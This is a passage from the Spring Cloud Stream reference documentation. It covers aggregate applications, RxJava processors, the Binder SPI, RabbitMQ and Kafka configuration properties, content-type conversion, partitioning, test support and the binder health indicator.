follows:\n\n[source,java]\n----\n@SpringBootApplication\npublic class SampleAggregateApplication {\n\n\tpublic static void main(String[] args) {\n\t\tnew AggregateApplicationBuilder()\n\t\t\t.from(SourceApplication.class).args(\"--fixedDelay=5000\")\n\t\t\t.via(ProcessorApplication.class)\n\t\t\t.to(SinkApplication.class).args(\"--debug=true\").run(args);\n\t}\n}\n----\n\nThe starting component of the sequence is provided as argument to the `from()` method.\nThe ending component of the sequence is provided as argument to the `to()` method.\nIntermediate processors are provided as argument to the `via()` method.\nMultiple processors of the same type can be chained together (e.g. for pipelining transformations with different configurations).\nFor each component, the builder can provide runtime arguments for Spring Boot configuration.\n\n\n==== RxJava support\n\nSpring Cloud Stream provides support for RxJava-based processors through the `RxJavaProcessor` available in `spring-cloud-stream-rxjava`.\n\n[source,java]\n----\npublic interface RxJavaProcessor<I, O> {\n\tObservable<O> process(Observable<I> input);\n}\n----\n\nAn implementation of `RxJavaProcessor` will receive `Observable` as an input that represents the flow of inbound message payloads.\nThe `process` method is invoked once at startup for setting up the data flow.\n\nYou can enable the use of RxJava-based processors and use them in your processor application by using the `@EnableRxJavaProcessor` annotation.\n`@EnableRxJavaProcessor` is meta-annotated with `@EnableBinding(Processor.class)` and will create the `Processor` binding.\nHere is an example of an RxJava-based processor:\n\n[source,java]\n----\n@EnableRxJavaProcessor\npublic class RxJavaTransformer {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(RxJavaTransformer.class);\n\n\t@Bean\n\tpublic RxJavaProcessor<String,String> processor() {\n\t\treturn inputStream -> inputStream.map(data -> {\n\t\t\tlogger.info(\"Got data = \" + data);\n\t\t\treturn data;\n\t\t})\n\t\t.buffer(5)\n\t\t.map(data -> String.valueOf(avg(data)));\n\t}\n\n\tprivate static Double avg(List<String> data) {\n\t\tdouble sum = 0;\n\t\tdouble count = 0;\n\t\tfor(String d : data) {\n\t\t\tcount++;\n\t\t\tsum += Double.valueOf(d);\n\t\t}\n\t\treturn sum\/count;\n\t}\n}\n----\n\n\n[NOTE]\n====\nWhen implementing an RxJava processor, it is important to handle exceptions as part of your processing flow.\nUncaught exceptions will be treated as errors by RxJava and will cause the `Observable` to complete, disrupting the flow.\n====\n\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\n.Producers and Consumers\nimage::producers-consumers.png[width=300,scaledwidth=\"75%\"]\n\nA _producer_ is any component that sends messages to a channel.\nThe channel can be bound to an external message broker via a Binder implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer will send messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA _consumer_ is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (i.e., publish-subscribe semantics).\nIf there are multiple consumer instances bound using the same group name, then messages will be load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (i.e., queueing semantics).\n\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the box utility classes and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface which is a strategy for connecting inputs and outputs to external middleware.\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n\tBinding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n\tBinding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* input and output bind targets - as of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future;\n* extended consumer and producer properties - allowing specific Binder implementations to add supplemental properties which can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following\n\n* a class that implements the `Binder` interface;\n* a Spring `@Configuration` class that creates a bean of the type above along with the middleware connection infrastructure;\n* a `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, e.g.\n\n```\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n```\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\nOut of the box, Spring Cloud Stream provides binders for Kafka, RabbitMQ, and Redis.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream will use it automatically.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can simply add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders`, which is a simple properties file:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (e.g., Kafka), and custom binder implementations are expected to provide them, as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (e.g., `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application which reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath will be created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\n[NOTE]\n====\nTurning on explicit binder configuration will disable the default binder configuration process altogether.\nIf you do this, all binders in use must be included in the configuration.\n====\n\nFor example, this is the typical configuration for a processor application which connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: foo\n binder: rabbit1\n output:\n destination: bar\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n\n=== Implementation strategies\n\nThis section details the binder implementation strategies for Kafka and Rabbit MQ, in what concerns mapping the Spring Cloud Stream concepts onto the middleware concepts.\n\n==== Kafka Binder\n\n.Kafka Binder\nimage::kafka-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe Kafka Binder implementation maps the destination to a Kafka topic.\nThe consumer group maps directly to the same Kafka concept.\nSpring Cloud Stream does not use the high-level consumer, but implements a similar concept for the simple consumer.\n\n\n==== RabbitMQ Binder\n\n.RabbitMQ Binder\nimage::rabbit-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe RabbitMQ Binder implementation maps the destination to a `TopicExchange`.\nFor each consumer group, a `Queue` will be bound to that `TopicExchange`.\nEach consumer instance that binds will trigger creation of a corresponding RabbitMQ `Consumer` instance for its group's `Queue`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders allow additional binding properties to support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications via any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Spring Cloud Stream Properties\n\nspring.cloud.stream.instanceCount::\n The number of deployed instances of an application.\nMust be set for partitioning and if using Kafka.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\n The instance index of the application: a number from `0` to `instanceCount`-1.\nUsed for partitioning and with Kafka.\nAutomatically set in Cloud Foundry to match the application's instance index.\nspring.cloud.stream.dynamicDestinations::\n A list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (allowing any destination to be bound).\n\nspring.cloud.stream.defaultBinder::\n The default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied using the format `spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (e.g., `output` for a `Source`).\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix will be included at runtime.\n\n==== Properties for Use of Spring Cloud Stream\n\nThe following binding properties are available for both input and output bindings and\nmust be prefixed with `spring.cloud.stream.bindings.<channelName>.`.\n\ndestination::\n The target destination of a channel on the bound middleware (e.g., the RabbitMQ exchange or Kafka topic).\n If not set, the channel name is used instead.\ngroup::\n The consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: null (indicating an anonymous consumer).\ncontentType::\n The content type of the channel.\n\/\/See <<content type management>>.\n+\nDefault: null (so that no type coercion is performed).\nbinder::\n The binder used by this binding.\nSee <<multiple-binders>> for details.\n+\nDefault: null (the default binder will be used, if one exists).\n\n==== Consumer properties\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.`.\n\nconcurrency::\n The concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\n Whether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\n When set to `raw`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when inbound data is coming from outside Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\nmaxAttempts::\n The number of attempts of re-processing an inbound message.\nCurrently ignored by Kafka.\n+\nDefault: `3`.\nbackOffInitialInterval::\n The backoff initial interval on retry.\nCurrently ignored by Kafka.\n+\nDefault: `1000`.\nbackOffMaxInterval::\n The maximum backoff interval.\nCurrently ignored by Kafka.\n+\nDefault: `10000`.\nbackOffMultiplier::\n The backoff multiplier.\n+\nDefault: `2.0`.\n\n==== Producer Properties\n\nThe following binding properties are available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.`.\n\npartitionKeyExpression::\n A SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionKeyExtractorClass::\n A `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionSelectorExpression::\n A SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionCount::\n The number of target partitions for the data, if partitioning is enabled.\nMust be\n set to a value greater than 1 if the producer is partitioned.\nOn Kafka, interpreted as a\n hint; the larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\n A comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (e.g., by pre-creating durable queues in RabbitMQ).\nheaderMode::\n When set to `raw`, disables header embedding on output.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when producing data for non-Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\n\n[[binder-specific-configuration]]\n== Binder-Specific Configuration\n\nThe following binder, consumer, and producer properties are specific to binder implementations.\n\n=== Rabbit-Specific Settings\n\n==== RabbitMQ Binder Properties\n\nBy default, the RabbitMQ binder uses Spring Boot's `ConnectionFactory`, and it therefore supports all Spring Boot configuration options for RabbitMQ.\n(For reference, consult the http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#common-application-properties[Spring Boot documentation].) RabbitMQ configuration options use the `spring.rabbitmq` prefix.\n\nIn addition to the Spring Boot options, the RabbitMQ binder supports the following properties:\n\nspring.cloud.stream.rabbit.binder.adminAddresses::\n A comma-separated list of RabbitMQ management plugin URLs.\nOnly used when `nodes` contains more than one entry.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.nodes::\n A comma-separated list of RabbitMQ node names.\nWhen more than one entry, used to locate the server address where a queue is located.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.compressionLevel::\n Compression level for compressed bindings.\nSee `java.util.zip.Deflater`.\n+\nDefault: `1` (BEST_LEVEL).\n\n==== RabbitMQ Consumer Properties\n\nThe following properties are available for Rabbit consumers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.consumer.`.\n\nacknowledgeMode::\n The acknowledge mode.\n+\nDefault: `AUTO`.\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\ndurableSubscription::\n Whether subscription should be durable.\nOnly effective if `group` is also set.\n+\nDefault: `true`.\nmaxConcurrency::\n Default: `1`.\nprefetch::\n Prefetch count.\n+\nDefault: `1`.\nprefix::\n A prefix to be added to the name of the `destination` and queues.\n+\nDefault: \"\".\nrequeueRejected::\n Whether delivery failures should be requeued.\n+\nDefault: `true`.\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nrepublishToDlq::\n By default, messages which fail after retries are exhausted are rejected.\nIf a dead-letter queue (DLQ) is configured, RabbitMQ will route the failed message (unchanged) to the DLQ.\nIf set to `true`, the bus will republish failed messages to the DLQ with additional headers, including the exception message and stack trace from the cause of the final failure.\ntransacted::\n Whether to use transacted channels.\n+\nDefault: `false`.\ntxSize::\n The number of deliveries between acks.\n+\nDefault: `1`.\n\n==== Rabbit Producer Properties\n\nThe following properties are available for Rabbit producers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.producer.`.\n\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\nbatchingEnabled::\n Whether to enable message batching by producers.\n+\nDefault: `false`.\nbatchSize::\n The number of messages to buffer when batching is enabled.\n+\nDefault: `100`.\nbatchBufferLimit::\n Default: `10000`.\nbatchTimeout::\n Default: `5000`.\ncompress::\n Whether data should be compressed when sent.\n+\nDefault: `false`.\ndeliveryMode::\n Delivery mode.\n+\nDefault: `PERSISTENT`.\nprefix::\n A prefix to be added to the name of the `destination` exchange.\n+\nDefault: \"\".\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\n\n=== Kafka-Specific Settings\n\n==== Kafka Binder Properties\n\nspring.cloud.stream.kafka.binder.brokers::\n A list of brokers to which the Kafka binder will connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultBrokerPort::\n `brokers` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the broker list.\n+\nDefault: `9092`.\nspring.cloud.stream.kafka.binder.zkNodes::\n A list of ZooKeeper nodes to which the Kafka binder can connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultZkPort::\n `zkNodes` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the node list.\n+\nDefault: `2181`.\nspring.cloud.stream.kafka.binder.headers::\n The list of custom headers that will be transported by the binder.\n+\nDefault: empty.\nspring.cloud.stream.kafka.binder.offsetUpdateTimeWindow::\n The frequency, in milliseconds, with which offsets are saved.\nIgnored if `0`.\n+\nDefault: `10000`.\nspring.cloud.stream.kafka.binder.offsetUpdateCount::\n The frequency, in number of updates, which which consumed offsets are persisted.\nIgnored if `0`.\nMutually exclusive with `offsetUpdateTimeWindow`.\n+\nDefault: `0`.\nspring.cloud.stream.kafka.binder.requiredAcks::\n The number of required acks on the broker.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.minPartitionCount::\n Effective only if `autoCreateTopics` or `autoAddPartitions` is set.\nThe global minimum number of partitions that the binder will configure on topics on which it produces\/consumes data.\nIt can be superseded by the `partitionCount` setting of the producer or by the value of `instanceCount` * `concurrency` settings of the producer (if either is larger).\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.replicationFactor::\n The replication factor of auto-created topics if `autoCreateTopics` is active.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.autoCreateTopics::\n If set to `true`, the binder will create new topics automatically.\nIf set to `false`, the binder will rely on the topics being already configured.\nIn the latter case, if the topics do not exist, the binder will fail to start.\nOf note, this setting is independent of the `auto.topic.create.enable` setting of the broker and it does not influence it: if the server is set to auto-create topics, they may be created as part of the metadata retrieval request, with default broker settings.\n+\nDefault: `true`.\nspring.cloud.stream.kafka.binder.autoAddPartitions::\n If set to `true`, the binder will create add new partitions if required.\nIf set to `false`, the binder will rely on the partition size of the topic being already configured.\nIf the partition count of the target topic is smaller than the expected value, the binder will fail to start.\n+\nDefault: `false`.\n\n\n==== Kafka Consumer Properties\n\nThe following properties are available for Kafka consumers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.consumer.`.\n\nautoCommitOffset::\n Whether to autocommit offsets when a message has been processed.\nIf set to `false`, an `Acknowledgment` header will be available in the message headers for late acknowledgment.\n+\nDefault: `true`.\nresetOffsets::\n Whether to reset offsets on the consumer to the value provided by `startOffset`.\n+\nDefault: `false`.\nstartOffset::\n The starting offset for new groups, or when `resetOffsets` is `true`.\nAllowed values: `earliest`, `latest`.\n+\nDefault: null (equivalent to `earliest`).\nenableDlq::\n When set to true, it will send enable DLQ behavior for the consumer.\n Messages that result in errors will be forwarded to a topic named `error.<destination>.<group>`.\n This provides an alternative option to the more common Kafka replay scenario for the case when the number of errors is relatively small and replaying the entire original topic may be too cumbersome.\n+\nDefault: `false`.\n\n==== Kafka Producer Properties\n\nThe following properties are available for Kafka producers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.producer.`.\n\nbufferSize::\n Upper limit, in bytes, of how much data the Kafka producer will attempt to batch before sending.\n+\nDefault: `16384`.\nsync::\n Whether the producer is synchronous.\n+\nDefault: `false`.\nbatchTimeout::\n How long the producer will wait before sending in order to allow more messages to accumulate in the same batch.\n(Normally the producer does not wait at all, and simply sends all the messages that accumulated while the previous send was in progress.) A non-zero value may increase throughput at the expense of latency.\n+\nDefault: `0`.\n\n[[contenttypemanagement]]\n== Content Type and Transformation\n\nTo allow you to propagate information about the content type of produced messages, Spring Cloud Stream attaches, by default, a `contentType` header to outbound messages.\nFor middleware that does not directly support headers, Spring Cloud Stream provides its own mechanism of automatically wrapping outbound messages in an envelope of its own.\nFor middleware that does support headers, Spring Cloud Stream applications may receive messages with a given content type from non-Spring Cloud Stream applications.\n\nSpring Cloud Stream can handle messages based on this information in two ways:\n\n* Through its `contentType` settings on inbound and outbound channels\n* Through its argument mapping performed for methods annotated with `@StreamListener`\n\nSpring Cloud Stream allows you to declaratively configure type conversion for inputs and outputs using the `content-type` property of a binding.\nNote that general type conversion may also be accomplished easily by using a transformer inside your application.\nCurrently, Spring Cloud Stream natively supports the following type conversions commonly used in streams:\n\n* *JSON* to\/from *POJO*\n* *JSON* to\/from https:\/\/github.com\/spring-projects\/spring-tuple\/blob\/master\/spring-tuple\/src\/main\/java\/org\/springframework\/tuple\/Tuple.java[org.springframework.tuple.Tuple]\n* *Object* to\/from *byte[]* : Either the raw bytes serialized for remote transport, bytes emitted by an application, or converted to bytes using Java serialization(requires the object to be Serializable)\n* *String* to\/from *byte[]*\n* *Object* to *plain text* (invokes the object's _toString()_ method)\n\nWhere _JSON_ represents either a byte array or String payload containing JSON.\nCurrently, Objects may be converted from a JSON byte array or String.\nConverting to JSON always produces a String.\n\n[[mime-types]]\n=== MIME types\n`content-type` values are parsed as media types, e.g., `application\/json` or `text\/plain;charset=UTF-8`.\nMIME types are especially useful for indicating how to convert to String or byte[] content.\nSpring Cloud Stream also uses MIME type format to represent Java types, using the general type `application\/x-java-object` with a `type` parameter.\nFor example, `application\/x-java-object;type=java.util.Map` or `application\/x-java-object;type=com.bar.Foo` can be set as the `content-type` property of an input binding.\nIn addition, Spring Cloud Stream provides custom MIME types, notably, `application\/x-spring-tuple` to specify a Tuple.\n\n[[mime-types-and-java-types]]\n=== MIME types and Java types\n\nThe type conversions Spring Cloud Stream provides out of the box are summarized in the following table:\n\n|===\n|Source Payload |Target Payload |content-type header | content-type | Comments\n\n|POJO\n|JSON String\n|ignored\n|application\/json\n|\n\n|Tuple\n|JSON String\n|ignored\n|application\/json\n|JSON is tailored for Tuple\n\n|POJO\n|String (toString())\n|ignored\n|text\/plain, java.lang.String\n|\n\n|POJO\n|byte[] (java.io serialized)\n|ignored\n|application\/x-java-serialized-object\n|\n\n|JSON byte[] or String\n|POJO\n|application\/json (or none)\n|application\/x-java-object\n|\n\n|byte[] or String\n|Serializable\n|application\/x-java-serialized-object\n|application\/x-java-object\n|\n\n|JSON byte[] or String\n|Tuple\n|application\/json (or none)\n|application\/x-spring-tuple\n|\n\n|byte[]\n|String\n|any\n|text\/plain, java.lang.String\n|will apply any Charset specified in the content-type header\n\n|String\n|byte[]\n|any\n|application\/octet-stream\n|will apply any Charset specified in the content-type header\n\n|===\n\n[[NOTE]]\nConversion applies to payloads that require type conversion.\nFor example, if a module produces an XML string with outputType=application\/json, the payload will not be converted from XML to JSON.\nThis is because the payload at the module's output channel is already a String so no conversion will be applied at runtime.\n\n[[TIP]]\nWhile conversion is supported for both input and output channels, it is especially recommended to be used for the conversion of outbound messages.\nFor the conversion of inbound messages, especially when the target is a POJO, the `@StreamListener` support will perform the conversion automatically.\n\n=== ``@StreamListener` and Message Conversion\n\nThe `@StreamListener` annotation provides a convenient way for converting incoming messages without the need to specify the content type of an input channel.\nDuring the dispatching process to methods annotated with `@StreamListener`, a conversion will be applied automatically if the argument requires it.\n\nFor example, let's consider a message with the String content `{\"greeting\":\"Hello, world\"}` and a `content-type` header of `application\/json` is received on the input channel.\nLet us consider the following application that receives it:\n\n[source,java]\n----\npublic class GreetingMessage {\n\n String greeting;\n\n public String getGreeting() {\n return greeting;\n }\n\n public void setGreeting(String greeting) {\n this.greeting = greeting;\n }\n}\n\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class GreetingSink {\n\n\t\t@StreamListener(Sink.INPUT)\n\t\tpublic void receive(Greeting greeting) {\n\t\t\t\/\/ handle Greeting\n\t\t}\n\t}\n----\n\nThe argument of the method will be populated automatically with the POJO containing the unmarshalled form of the JSON String.\n\n== Inter-Application Communication\n\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of adjacent applications.\n\nSupposing that a design calls for the Time Source application to send data to the Log Sink application, you can use a common destination named `ticktock` for bindings within both applications.\n\nTime Source will set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink will set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of a HDFS sink application, all three instances will have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications will have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed via Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (e.g., the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n=== Partitioning\n\n==== Configuring Output Bindings for Partitioning\n\nAn output binding is configured to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorClass` properties, as well as its `partitionCount` property.\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on the above example configuration, data will be sent to the target partition using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression which is evaluated against the outbound message for extracting the partitioning key.\n\n[TIP]\n====\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by setting the property `partitionKeyExtractorClass` to a class which implements the `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` interface.\nWhile the SpEL expression should usually suffice, more complex cases may use the custom implementation strategy.\n====\n\nOnce the message key is calculated, the partition selection process will determine the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the formula `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the key (via the `partitionSelectorExpression` property) or by setting a `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` implementation (via the `partitionSelectorClass` property).\n\nAdditional properties can be configured for more advanced scenarios, as described in the following section.\n\n[NOTE]\n====\nThe Kafka binder will use the `partitionCount` setting as a hint to create a topic with the given partition count (in conjunction with the `minPartitionCount`, the maximum of the two being the value being used).\nExercise caution when configuring both `minPartitionCount` for a binder and `partitionCount` for an application, as the larger value will be used.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is disabled (the default), then the binder will fail to start.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is enabled, new partitions will be added.\nIf a topic already exists with a larger number of partitions than the maximum of (`minPartitionCount` and `partitionCount`), the existing partition count will be used.\n====\n\n===== Configuring Input Bindings for Partitioning\n\nAn input binding is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data need to be partitioned, and the `instanceIndex` must be a unique value across the multiple instances, between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition (or, in the case of Kafka, the partition set) from which it receives data.\nIt is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario which using multiple instances for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Dataflow can simplify the process significantly by populating both the input and output values correctly as well as relying on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder`.\nThis is useful especially for unit testing your microservices.\n\nThe `TestSupportBinder` allows users to interact with the bound channels and inspect what messages are sent and received by the application\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nThe user can also send messages to inbound message channels, so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor.\n\n[source]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = ExampleTest.MyProcessor.class)\n@IntegrationTest({\"server.port=-1\"})\n@DirtiesContext\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private BinderFactory<MessageChannel> binderFactory;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the example above, we are creating an application that has an input and an output channel, bound through the `Processor` interface.\nThe bound interface is injected into the test so we can have access to both channels.\nWe are sending a message on the input channel and we are using the `MessageCollector` provided by Spring Cloud Stream's test support to capture the message has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name of `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\n== Samples\n\nFor 